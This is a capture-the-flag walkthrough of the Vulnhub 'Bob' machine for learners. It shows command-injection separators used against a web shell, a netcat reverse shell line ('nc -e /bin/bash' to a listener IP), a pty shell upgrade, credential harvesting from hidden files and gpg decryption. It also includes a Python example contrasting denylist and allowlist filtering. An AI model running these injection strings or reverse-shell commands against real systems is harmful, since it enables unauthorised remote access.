Vulnhub’s Bob: A Walkthrough
Hello readers,
This is a writeup of the Bob machine, found on Vulnhub’s platform. The production credits go to c0rruptedb1t.
You can get the machine from here- https://download.vulnhub.com/bob/Bob_v1.0.1.ova
RECONNAISSANCE
Let’s start off by using the ‘netdiscover’ command to find the victim machine’s IP.
Conduct the Nmap scan with the stealth and verbose switches enabled. We get,
ENUMERATION
Targeting the FTP server running on port 21, we try the classic anonymous login attempt. It backfires, since the anonymous user requires a password. Keep in mind that the credentials for an anonymous FTP login are:-
Username- ftp
Password- <space bar>
Moving our attention to the HTTP port, let’s fire up Firefox and type in the IP address of the box.
Browsing through each section, we make our way through the website.
In the ‘News’ section’s page source, we find
We keep this in mind and move on.
On the ‘Contact Us’ page, we find a list of people’s names. These could be possible users on the machine/web server.
Heading over to the ‘Login Page’, we find this message:-
No login system to bruteforce our way through. Sigh
Poking through its page source, we find the following message left for us.
Web Shell! It sounds more like a reverse shell grab opportunity.
Remember the encoded message that we found earlier; let’s attempt to decode it. We store the string in a file named ‘Decode’ and run the following command:-
Command- base64 --decode Decode >> Decode
We are in fact appending the decoded result to the same file. Viewing the file’s output, we get:-
passwords.html seems like a possible webpage on the server. Now let’s undertake a dirb scan of the website
Command- dirb http://<IP>
Enumerating the ‘robots.txt’ file, we get:-
Enumerating each webpage, we find:-
a) login.php- Doesn’t exist
b) dev_shell.php- Looks like a remote machine shell, in which we can enter commands
c) lat_memo.html- Nothing of note from the page source
d) passwords.html- As suspected, it is a webpage on the server
Going through the clues that we have, it seems Bob is the web server’s administrator.
I had a strong feeling that the above text was in Ook or Brainfuck format. When analyzing the text using decoders, it gave out gibberish text.
Shifting our attention to the web shell, we start off by giving simple commands. The shell belongs to the victim machine and gives out the information we need to know
Command- whoami
Command- sudo -l
Command- ls
How to approach such shells?
When entering commands such as ‘ls’, we were not allowed to view the output (the output was rejected)
What to do?
Use separators such as ‘;’, ‘|’ or ‘||’ between commands
Placing these symbols between two commands raises the chance that output is generated for at least one of them
Example- pwd||ls ←(no space) or pwd|ls ←(output may be generated)
Adopting this approach, we run a few commands:-
Command- pwd |ls
In the directory listing, we find that there is a file named ‘dev_shell.php.bak’. We attempt to download it.
Command- wget http://<IP>/dev_shell.php.bak
Analyzing its contents, we understand that the symbols ‘ and ; are blacklisted; a command containing them produces no output
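To show why a filter like the one in dev_shell.php.bak is weak, here is an added Python example (not the box’s own PHP code, and not an exploit): a reconstruction of the denylist pattern the walkthrough describes, which rejects only ‘ and ;, placed beside an allowlist version that accepts a single known command name and runs it through argv with no shell involved. The ALLOWED_COMMANDS set, the function names and the sample inputs are assumptions made for this example.

```python
"""Denylist vs allowlist command filtering.

Added illustration, not the box's dev_shell.php: the web shell on this
machine rejected input containing a couple of characters, which is a
denylist. A denylist only catches what its author thought of; an
allowlist of known commands, run without a shell, is the defensible
design.
"""
import shlex
import subprocess
from typing import List

# Denylist reconstructed from the walkthrough's observation: ' and ; are
# rejected. Anything else, including other shell operators, is passed on.
DENIED_CHARS = {"'", ";"}


def denylist_accepts(user_input: str) -> bool:
    """Return True if the (weak) denylist would let the input through."""
    return not any(ch in user_input for ch in DENIED_CHARS)


# Hardened variant (assumed set for this example): exact command names we
# are willing to run, with no arguments at all, executed via argv so no
# shell ever parses the user's text.
ALLOWED_COMMANDS = {"whoami", "pwd", "id", "uptime"}


def allowlist_parse(user_input: str) -> List[str]:
    """Return argv for an allowed command, or raise ValueError."""
    try:
        argv = shlex.split(user_input)
    except ValueError as exc:  # unbalanced quotes and similar
        raise ValueError(f"unparseable input: {exc}") from None
    if len(argv) != 1:
        raise ValueError("exactly one bare command is permitted")
    if argv[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"command not permitted: {argv[0]!r}")
    return argv


def run_allowlisted(user_input: str) -> str:
    """Run only an allowlisted command, without a shell, and return stdout."""
    argv = allowlist_parse(user_input)
    result = subprocess.run(
        argv, capture_output=True, text=True, timeout=5, check=False
    )
    return result.stdout


if __name__ == "__main__":
    # Constructed sample inputs: the operators the walkthrough used to get
    # output past the filter are caught by the allowlist, not the denylist.
    for sample in ["pwd", "pwd|ls", "ls;id", "whoami && id"]:
        verdict = "accepted" if denylist_accepts(sample) else "rejected"
        print(f"denylist:  {sample!r:14} {verdict}")
        try:
            allowlist_parse(sample)
            print(f"allowlist: {sample!r:14} accepted")
        except ValueError as err:
            print(f"allowlist: {sample!r:14} rejected ({err})")
```

The point of the hardened variant is not the particular set of characters it checks but that it never hands the user’s text to a shell at all: shlex.split turns ‘pwd|ls’ into the single token ‘pwd|ls’, which is simply not a permitted command name, so there is no separator to argue about.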
GAINING ACCESS
Now it’s time to insert our reverse shell. We attempt 4 methods of reverse shell:-
We take the reverse shell code snippets from Pentestmonkey’s cheat sheet- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
We set up our command in the web shell in the following way:-
Command- whoami && <Reverse Shell Snippet Code>
NOTE: Make sure to edit the IP address according to your machine’s IP, and the port to one of your choice
PHP-Not successful
Python-Not successful
Bash-Not successful
Netcat-For this method, we set up a netcat listener on our terminal
Command-nc -lvp 4444
Command to be run on webshell:-
Command-whoami && nc -e /bin/bash 192.168.43.176 4444
Upon hitting enter, our netcat listener gains the reverse shell on Millburg High School’s server
We are currently operating as the ‘www-data’ user and need a more standard, interactive shell. Fortunately, we have a python one-liner to upgrade it
LEVERAGING OUR SHELL
Command- python -c 'import pty;pty.spawn("/bin/bash")'
While viewing the directory listing of /html, we find a hidden file named ‘.hint’. Attempting to read its contents, we are shown gibberish as display text. Let’s try the alternative of using the ‘head’ and ‘tail’ commands
Command- head .hint
Not finding anything else useful in /html, we switch over to /home.
We find 4 directories:-
a) /bob- Nothing interesting of note, except for a hidden file named ‘.old_passwordfile.html’. Note that the file is not readable using the ‘cat’ command; instead we use the ‘head’ command (allowing us to read the top portion of the file). From the file, we get ‘seb’ and ‘james’ users’ credentials:-
b) /seb- Nothing interesting of note
c) /james- Nothing interesting of note
d) /elliot- Within elliot’s directory, we find a file named ‘theadminisdumb.txt’. Reading its contents, we find:-
LEVERAGING PRIVILEGES
Having got elliot’s credentials, we log in as the elliot user.
NOTE: All the while, we were listing directories with hidden files included, to discover hidden files
Elliot does not have sudo privileges, nor do we find any writable files to elevate ourselves through. Clearly, we were missing something
Again moving to /bob, we catch sight of 3 more hidden files within his Documents folder. The directory listing is shown below:-
Targeting the ‘staff.txt’ file first, we get:-
At first glance, we can see that the ‘login.txt’ file is encrypted using GNU Privacy Guard (gpg) encryption. It remains locked until we find a suitable passphrase
‘Secret’ seems to be a directory. It is nested, and we make our way through it. At /No_Lookie_In_Here, the directory listing gives us a file named ‘notes.sh’
NOTE: It is a large file and we need to apply both the ‘head’ and ‘tail’ commands to grab its contents
I admit it was not making any sense. This could probably be a conversation between the system’s users, but we are unable to grasp any meaning. More worrying is that we have a file waiting to be decrypted.
In the English language, there exists a term called ‘acrostic’, in which the starting letters of successive lines form a complete word. I admit I wasn’t aware of such a concept.
Upon closer inspection, we piece together each starting letter to form a word:-
H A R P O C R A T E S
Fun trivia- Harpocrates is in fact the Greek god of Confidentiality and Secrecy
It’s fitting for the machine’s and an InfoSec student’s aim.
Using the passphrase to decrypt the file,
Command- gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
We extract the following file and its contents:-
Having got bob’s credentials, we log in as ‘bob’ to find the flag waiting for us in the / directory’s listing.
REPORTING
Well,you have it now!
Conclusion
Well, that was a pretty fun box to play. I would definitely recommend this machine to any aspiring pentester. Until then, let me find more boxes to pwn!